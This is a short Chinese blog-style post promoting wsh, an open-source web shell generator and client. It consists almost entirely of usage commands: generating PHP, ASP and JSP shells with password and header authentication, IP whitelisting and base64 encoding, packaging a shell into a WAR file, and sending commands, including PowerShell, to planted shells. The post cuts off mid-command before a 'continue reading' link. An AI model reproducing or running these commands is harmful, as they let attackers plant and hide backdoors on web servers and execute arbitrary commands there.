天天看点

超实用的网络安全开源工具

1.Web Shell生成器和命令行接口工具

生成器使用了php、asp和jsp来创建Webshell

https://github.com/EatonChips/wsh
git clone https://github.com/EatonChips/wsh.git

wsh 127.0.0.1:8080/test.php --param cmd
wsh generate php --param cmd --no-file -o shell.php
wsh generate php --no-file --header user-agent  -o shell.php
wsh 127.0.0.1:8080/shell.php --header user-agent
wsh generate php --no-file --param cmd -w 127.0.0.1,10.0.23.3 -w 12.4.22.3 -o shell.php
wsh generate php --no-file --param cmd --pass S3cr3t --pass-param pass
wsh 127.0.0.1:8080/shell.php --param cmd -P pass:S3cr3t
wsh generate php --no-file --param cmd --pass S3cr3t --pass-header pass-header
wsh 127.0.0.1:8080/shell.php --param cmd -H pass-header:S3cr3t
wsh g php --param cmd --no-file --base64
wsh g jsp --param cmd --no-file -o index.jsp
jar -cvf shell.war index.jsp
wsh http://10.0.0.27/shell.asp --param cmd --prefix powershell.exe
127.0.0.1:8080/shell.php --param cmd --log localhost.log
wsh 127.0.0.1:8080/inde
           

继续阅读